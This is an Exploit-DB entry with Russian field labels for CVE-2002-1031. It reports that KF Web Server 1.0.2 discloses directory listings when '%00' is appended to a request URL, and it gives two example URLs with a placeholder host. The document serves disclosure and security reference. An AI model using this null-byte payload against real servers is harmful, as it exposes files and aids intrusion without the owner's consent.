Exploit Key Focus KF Web Server 1.0.2 - Directory Contents Disclosure

[Exploiter]

EDB-ID

21597

Проверка EDB

1. Пройдено

Автор

SECURITEINFO.COM

Тип уязвимости

REMOTE

Платформа

WINDOWS

CVE

cve-2002-1031

Дата публикации

2002-07-08

source: https://www.securityfocus.com/bid/5177/info

It has been reported that version 1.0.2 of KF Web Server discloses the contents of directories when a certain character is present in the URL.

If a remote attacker appends the "%00" character, it will cause the web server to display the contents of the current directory.

http://server_name/subdir/%00
http://server_name/%00